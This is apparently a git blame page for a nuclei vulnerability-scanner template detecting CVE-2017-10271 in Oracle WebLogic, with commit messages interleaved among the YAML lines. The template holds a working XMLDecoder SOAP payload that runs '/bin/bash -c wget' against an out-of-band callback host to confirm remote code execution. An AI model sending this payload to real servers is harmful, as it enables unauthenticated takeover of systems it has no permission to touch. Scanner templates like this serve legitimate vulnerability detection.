daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2017/CVE-2017-10271.yaml

57 lines
2.3 KiB
YAML
Raw Normal View History

Added template CVE-2017-10271 for Weblogic. Added Weblogic workflow.
2021-02-03 00:48:46 +00:00
id: CVE-2017-10271
info:
Update CVE-2017-10271.yaml
2021-02-04 09:03:17 +00:00
name: CVE-2017-10271
Added template CVE-2017-10271 for Weblogic. Added Weblogic workflow.
2021-02-03 00:48:46 +00:00
author: dr_set
severity: high
updated poc
2021-02-04 19:43:23 +00:00
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
Added comments with URLs under the "references" field Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84
2021-08-19 13:15:35 +00:00
reference:
- https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
- https://github.com/SuperHacker-liuan/cve-2017-10271-poc
oob tags update
2021-10-18 20:40:26 +00:00
tags: cve,cve2017,rce,oracle,weblogic,oast
Added cve annotations + severity adjustments
2021-09-10 11:26:40 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.50
cve-id: CVE-2017-10271
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses:
2021-02-05 19:44:41 +00:00
Added template CVE-2017-10271 for Weblogic. Added Weblogic workflow.
2021-02-03 00:48:46 +00:00
requests:
updated poc
2021-02-04 19:43:23 +00:00
- raw:
- |
Satisfying the linter (all errors and warnings) * whitespace modifications only
2021-08-19 14:44:46 +00:00
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en
Content-Type: text/xml
Update CVE-2017-10271.yaml
2021-02-04 19:44:43 +00:00
Satisfying the linter (all errors and warnings) * whitespace modifications only
2021-08-19 14:44:46 +00:00
<?xml version="1.0" encoding="utf-8"?>
payload update to work on both platform
2021-09-12 13:02:24 +00:00
<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
Satisfying the linter (all errors and warnings) * whitespace modifications only
2021-08-19 14:44:46 +00:00
<soapenv:Header>
payload update to work on both platform
2021-09-12 13:02:24 +00:00
<work:WorkContext
xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
Satisfying the linter (all errors and warnings) * whitespace modifications only
2021-08-19 14:44:46 +00:00
</void>
payload update to work on both platform
2021-09-12 13:02:24 +00:00
<void index="1">
<string>-c</string>
Satisfying the linter (all errors and warnings) * whitespace modifications only
2021-08-19 14:44:46 +00:00
</void>
payload update to work on both platform
2021-09-12 13:02:24 +00:00
<void index="2">
<string>wget {{interactsh-url}}</string>
</void>
</array>
<void method="start"/></void>
Satisfying the linter (all errors and warnings) * whitespace modifications only
2021-08-19 14:44:46 +00:00
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
updated poc
2021-02-04 19:43:23 +00:00
Added template CVE-2017-10271 for Weblogic. Added Weblogic workflow.
2021-02-03 00:48:46 +00:00
matchers:
payload update to work on both platform
2021-09-12 13:02:24 +00:00
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"